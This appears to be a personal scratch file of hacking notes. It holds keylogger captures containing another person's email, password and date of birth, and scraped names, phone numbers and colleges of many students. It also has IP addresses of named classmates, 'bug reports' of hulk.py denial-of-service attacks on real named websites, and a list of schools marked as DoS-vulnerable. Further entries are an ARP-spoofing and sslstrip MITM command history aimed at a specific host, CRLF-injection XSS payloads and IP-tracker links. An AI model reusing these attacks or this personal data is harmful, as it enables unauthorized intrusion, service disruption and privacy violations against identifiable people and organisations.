Oracle Virtual Box VM https://www.virtualbox.org/wiki/Linux_Downloads
cuppmaster https://github.com/Mebus/cupp
Wappalyzer https://www.wappalyzer.com/download 
/CHANGELOG.txt (for version of CMS)
/admin (To get admin details)
exif pic.jpg
exiftool  pic.jpeg
metapicz
msfvenom
msfconsole -q


ngrok.com
faceprep
signup
msf5

VULNERABLE
TNEB
FOSSO
SKULLCANDY 
Farm Fresh
MUNSHI SINGH COLLEGE
VGP cinema
AGS cinema
trophy
______________________________________________________________________________________________________________________________________________________________________

<Shift><Caps Lock>instagram.com<CR>
saravanakrish.995<Shift>Rhik<Shift>@2001<CR>
google drive<CR>

<Shift><Shift><Shift>Robert <Shift>Fair<CR>
<Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift>Email<Right Shift><Right Shift>: robertfair<Shift>@dayrep.com<CR>
<Shift>Pass<Right Shift>: <Shift><Shift><Shift><Shift>RXXb1i<Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><Shift><^H><^H><^H><^H><^H><^H><CR>
<^H><Shift><Shift><Shift>R<Shift>XX<^H><^H><^H><Caps Lock>RXX<Caps Lock>b1iu<Caps Lock>M<Caps Lock><CR>
<Caps Lock>DOB<Caps Lock><Right Shift>: <Caps Lock>M<Caps Lock>ar 31 1987<^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><^H><Right><CR>


_______________________________________________________________________________________________________________________________________________________________________


https://www.apkonline.net/filemanager.php?username=1570122858

___________________________________________________________________________________________________________________________________________________________________________________

Faceprep:

madhu
9704610088
Jintu college Anatapur

Muskaan j
7676920290
pes

salagomathi.S
6379990231
Valliammai Engineering College, Kattankulathur

Anuradha 
9834838465
Nagesh Karajgi Orchid College of Engineering and Technology, Hipparge

Tolapu Lokesh
9603866021
Rajiv Gandhi University of Knowledge Technologies, Idupulapaya

Preeti Jannu
8095160798
chetan college of comerce and BCA

Anil Kumar
7036726269
Vbit

Vineeta Vastrad
9019469901
Karnatak University

DEBMANI SAHA
8017536680
JADAVPUR UNIVERSITY

G.Dineshkumar
9786254911
Hindustan College of Engineering and Technology, Coimbatore
https://i1.faceprep.in/users/picture/pic-1322379-1561551857.jpg

mohamed noohu abbas
1322766
9698808232
electrical engineer
Sethu Institute of Technology, S.Kallupatti

N Rajesh Reddy
1322465
9704717355
student
Sree Vidyanikethan Engineering College, Kuchi Vari Palli

Sundari Velappan
1459293
9600337633
Pursuing my B.Tech degree 
Kalasalingam Academy of Research and Education, Krishnan Kovil

rani
1452281
9167470238
TSEC

Aishwarya Damodharan
+91 7032659190
1412719
JSS Academy Of Technical Education Karnataka

https://www.youtube.com/user/AishwaryaDamodaran

http://www.greyfoxz.in/aishwaryad

https://www.facebook.com/aishwarya.damodaran

https://in.linkedin.com/in/aishwarya-damodaran-5192b4174?trk=public_profile_samename_profile_profile-result-card_result-card_full-click

https://www.instagram.com/damodaranaishwarya/?hl=en

https://i1.faceprep.in/users/picture/pic-1412719-1564807095.jpg

muni sekhar
1412319
9629603649
SASTRA University, Tirumalaisamudram

Nikita Pandurang Ghodke
1388327
9823731034
VPKBIET ,Baramati

Rahul Dev Gantayat
8093735875
GIET UNIVERSITY, GUNUPUR
1375359

vandana nayak
1444444
9353611968
i am a b.tech student
Shri Madhwa Vadiraja Institute of Technology and Management, Shankarpura

Sowmya
1334354
9063213043
Anits

Pruthvi S kumar
8197547834
Enthusiatic final year grad student looking for work opportunities
Reva University, Bengaluru

sudhanshu panday
7903684709
it engineer
Technocrats Institute of Technology and Science, Bhopal

sravya.pilli
1445328
9515757426
Sri Vishnu engineering college for women

Alisha Chudiwalla
1394921
9938724521
https://i1.faceprep.in/users/picture/pic-1394921-1568091755.jpg
ITER

Divya Mokhara
1393987
https://i1.faceprep.in/users/picture/pic-1393987-1563560157.jpg

E Kumar
9600211806

GOWRI PRASATH.B
1453147
9486740455
Coimbatore Institute of Technology, Coimbatore

Komal Kokni
8530557096
Software Engineer
KK Wagh Institute of Engineering Education and Research, Nashik

Krishna Chaithanya
9618015396
optimistic and passionate
bits  goa

Gulruba Shamsi
8958451829
smart worker
Anand Engineering College, Runkata

Reciful Arteeq
https://lh3.googleusercontent.com/-zPXKI-HFV1c/AAAAAAAAAAI/AAAAAAAAABs/9xBdGz1NQQA/s96-c/photo.jp1
9003796006
reficul761@gmail.com
Tamil Nadu, India

__________________________________________________________________________________________________

https://www.youtube.com/watch?v=KTkm33xmnFY
https://www.youtube.com/watch?v=VPl1TMCAIy8
_______________________________________________________________________________________________

NOV 4TH
Remote Audio recorder
dvwa
owasp
bwapp
genemotion
active voip 
apktool
alexander khohan
mobile free tracker
_______________________________________________________________________________________________

Cetra 
+918925687213

Guna Vel
gunavelmm@gmail.com
+916382435607
Reliance Jio

Vishnu:172.16.246.237
Saravanan: 172.16.241.51
Rhik: 172.16.242.71
Vishwa: 172.16.241.154
	172.16.243.166
____________________________________________________________________________________________________________________________________________________

Success. You can now start the database server using:

    pg_ctlcluster 12 main start

Ver Cluster Port Status Owner    Data directory              Log file
12  main    5433 down   postgres /var/lib/postgresql/12/main /var/log/postgresql/postgresql-12-main.log
update-alternatives: using /usr/share/postgresql/12/man/man1/postmaster.1.gz to provide /usr/share/man/man1/postmaster.1.gz (postmaster.1.gz) in auto mode
________________________________________________________________________________________________________________________________________________________________

Bug Report Template
====================

Bug ID: 
CVE-2018-19935

Bug Name: 
DENIAL OF SERVICE (DOS ATTACK)
  
Summary:
ext/imap/php_imap.c in PHP 5.x and 7.x before 7.3.0 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty string in the message argument to the imap_mail function.

Submit Date:
23-11-2019
           
Reporter:
R.K.Poornesh Adhithya       

Attacker Operating System: 
LINUX


Victim Operating System: 
UNIX(host) 

Target Website URL: 
https://dmisqatar.com/

Web Server: 
Apache 2.4.39

Programming Language:
PHP 7.0.33

CMS:
WordPress 5.2.4        


Description
===========

CVSS Base Score:
Confidentiality Impact: None (There is no impact to the confidentiality of the system.)
Integrity Impact: 	None (There is no impact to the integrity of the system)
Availability Impact: 	Partial (There is reduced performance or interruptions in resource availability.)
Access Complexity: 	Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication: 	Not required (Authentication is not required to exploit the vulnerability.)
Gained Access: 		None
Vulnerability Type(s): 	Denial Of Service	
CWE ID: 		476


Steps to reproduce

1. Start Etherape Monitor on Kali Linux
2. Start Terminal
3. Start hulk.py DOS attack tool on Terminal providing the target url (here, https://www.dmisqatar.com/) 
4. DOS Attack Response Code is generated
5. Floods connections to the server until the server crashes and site goes down


Result
-------------

Results in a Slowloris Denial Of Service Attack


How To Fix It
--------------

1. UPGRADE PHP FROM PHP 7.0.33 TO 7.3.X
2. PERFORM A CAPTCHA CHECK


Reference Links
----------------
https://www.shodan.io/host/37.48.108.137
https://nvd.nist.gov/vuln/detail/CVE-2018-19935#vulnCurrentDescriptionTitle
https://www.cvedetails.com/cve/CVE-2018-19935/

Screenshots
------------
Screenshots are attached.
______________________________________________________________________________________________________________________________________________________________

DOS ATTACK VULNERABLE WEBSITES

1. MUNSHI SINGH COLLEGE
2. BHAVKUNJ SCHOOL
3. DMIS DOHA
4. SHANTHINIKETAN
5. BHAVANS
6. BIRLA PUBLIC SCHOOL
7. BANARES COLLEGE

______________________________________________________________________________________________________________________________________

MITM

 1086  echo 1 > /proc/sys/net/ipv4/ip_forward
 1087  sysctl -w net.ipv4.ip_forward=1
 1088  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
 1089  sudo ettercap -T -Q -M arp -i wlan0 //172.16.241.51//
 1357  sslstrip -l 8080
 1217  urlsnarf -i wlan0
 1091  arpspoof -i wlan0 -t 172.16.241.51 172.16.241.1
 1092  arpspoof -i wlan0 -t 172.16.241.1 172.16.241.51
 1158  netsh wlan show interfaces


________________________________________________________________________________________________________________________________________________________________________

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500


__________________________________________________________________________________
Enigma
bixes92920@mailapp.top
test123

________________________________________________________________________________________

tla
ieee or ieee comsoc
sigma xi
lug
csi

________________________________________________________________________________________________

BUG REPORT

Bug ID:
CVE-2016-10707

Bug Name:
DENIAL OF SERVICE (DOS ATTACK)
 
Summary:
jQuery 3.0.0-rc.1 is vulnerable to Denial of Service (DoS) due to removing a logic that lowercased attribute names. Any attribute getter using a mixed-cased name for boolean attributes goes into an infinite recursion, exceeding the stack call limit.

Submit Date:
10-12-2019
           
Reporter:
R.K.Poornesh Adhithya       

Target Website URL:
https://ieeevit.com/

Web Server:
Apache

JavaScript Libraries:
jQuery (3.2.1)
jQuery Migrate (3.0.0)        


DESCRIPTION:

CVSS v2.0 Base Score: 5.0 (MEDIUM)

CVSS v3.x Base Score: 7.5 (HIGH)

Confidentiality Impact: None (There is no impact to the confidentiality of the system.)

Integrity Impact: None (There is no impact to the integrity of the system)

Availability Impact: Partial (There is reduced performance or interruptions in resource availability.)

Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )

Authentication: Not required (Authentication is not required to exploit the vulnerability.)

Gained Access: None

Vulnerability Type(s): Denial Of Service    

CWE ID: 400


STEPS TO REPRODUCE (EXPLOIT):

1. Start Etherape Monitor on Kali Linux
2. Start Terminal
3. Start hulk.py DOS attack tool on Terminal providing the target url (here, https://www.dmisqatar.com/)
4. DOS Attack Response Code is generated
5. Floods connections to the server until the server crashes and site goes down


RESULT:

Results in a Slowloris Denial Of Service Attack


HOW TO FIX IT:

1. UPGRADE YOUR jQuery Libraries TO THE LATEST VERSION
2. PERFORM A CAPTCHA/RECAPTCHA CHECK
3. LOAD BALANCING IS ALSO AN ALTERNATE SOLUTION

REFERENCE LINKS:

https://www.shodan.io/host/172.104.185.43
https://nvd.nist.gov/vuln/detail/CVE-2016-10707
https://www.cvedetails.com/cve/CVE-2016-10707/


SCREENSHOTS:

Screenshots are attached.

BEFORE PERFORMING THE ATTACK:

DURING THE DOS ATTACK:

PLEASE DO ACKNOWLEDGE MY REPORT!!!

Regards,
R.K.Poornesh Adhithya

_________________________________________________________________________________________________________________________________________________

*CVE-2016-0736 Cookie Editing*
CVE-2015-3185 CRLF INJECTION TO XSS
CVE-2015-3184 CRLF INJECTION TO XSS
CVE-2018-1312 CRLF INJECTION TO XSS
*CVE-2016-8612 Improper Input Validation*
CVE-2018-17199 Cookie Editing
CVE-2014-8109 CRLF INJECTION TO XSS
CVE-2017-9798 XSS
*CVE-2019-0220 /*
*CVE-2016-4975 CRLF INJECTION TO XSS *
CVE-2018-1283 XSS
CVE-2016-8743 XSS

*The site http://kaveribus.com/mobile/booking.php is behind AWS Elastic Load Balancer (Amazon) WAF.*

*CVE-2013-4352 	DOS
CVE-2014-0231	DOS
CVE-2017-9788	DOS
CVE-2013-6438	DOS
CVE-2017-15710	DOS
CVE-2014-3523	DOS
CVE-2014-0226	DOS
CVE-2014-0098	DOS
CVE-2014-0118	DOS
CVE-2014-0117	DOS
CVE-2016-2161	DOS*


%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

?page=%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0AContent-Length: 25%0D%0A%0D%0A<script>alert(1)</script>

___________________________________________________________________________________________________________________________________________________

King Of Good Times
kingofgoodtimesn51.8163@grr.la
9013181234
St. Xavier's College, Kolkata
x+y=77
x+z=111
x+y+z=124
Find x, y, z.
x= "Uk9UVEVOIE5VTUJFUlM="
x+y= "dWdnY2Y6Ly9qamouc25wcmNlcmMudmEv"
x+z= "YGNnYmdnZw=="
x+y+z= "e35lJWt+fXYgfXFgXXRgcm9bIChfXWBxdHE="

kingofgoodtimesn51.8163@grr.la
bjazGF
123 124 105 107 110 111 104 105

On 9th June 2019, India VS Australia World Cup Cricket Match took place at Ovals, London. Intelligence report tells us this match was fixed, and officers incharge could observe that the people involved in this match-fixing left one picture near their seat. There were total 8 same pictures spotted after the match. The Pictures were found in the following order of their seat numbers: 123, 124, on 105, 107, 110, 111, 104 and another one near seat number 105. But the officers incharge had no clue about the match-fixers because they wore masks during the match and spoofed their identity.
Now our only clue is that picture.
link: http://bit.ly/ctfpicture
Could You Please "HELP" them to solve their Problem by finding the match-fixer's details.
(Details includes Name, Phone Number and Location.) 

Solution:
Name: Vijay Mallya
Number: 9013181234
Location: Tewin

_____________________________________________________________________________________________________________________________________________________________________

insta
sai_2142
digesh__j
______________________________________________________________________________________________________________________________________________________________________________________________
PORTSWIGGER
password:
%U%cWd^9Nl1%r%Ze#Fsj!ZDh%T%tKjc3%q%OFFx%F%M3R5a@np%z%eI0Ml%8%N3&lw*akU%6%g%4%


white_devil@yopmail.com
whitedevil
3J92Yyi3CXbnGDyLF6pXAYk_8aAzZX2P
______________________________________________________________________________________________________________________________________________________________________________________________

Apple Password Finger Print Scan
Relation between Users and Movies Promotion Cycle
Relation between Wholesaler, Distributer, Retailer and Consumer Diagram
Should not delete Security Mail from iCloud mail and Gmail
QR Code in Visiting Card

___________________________________________________________________________________________________________________________________________________________________________________

blue hosting provider
emkei fake mailer
idchanger
attino 85
ilspy
mobihak
OSMEDOUS

________________________________________________________________________________________________________________________________________________________________________________________

 https://grabify.link/track/HEMLDR 

https://grabify.link/J8QP5E

http://bit.do/fxDtH

___________________________________________________________________________________________________________________________________________________________________________________________________________

BANK INFORMATION:

PAYTM:

PAYPAL:

9677056226
CYPARDOX
connect@cypardox.com
CYPARDOX

cypardoxjoinswithtsb123
__________________________________________________________________________________

ZOOM:
sotagi3456@zaelmo.com
qwertyORtest123




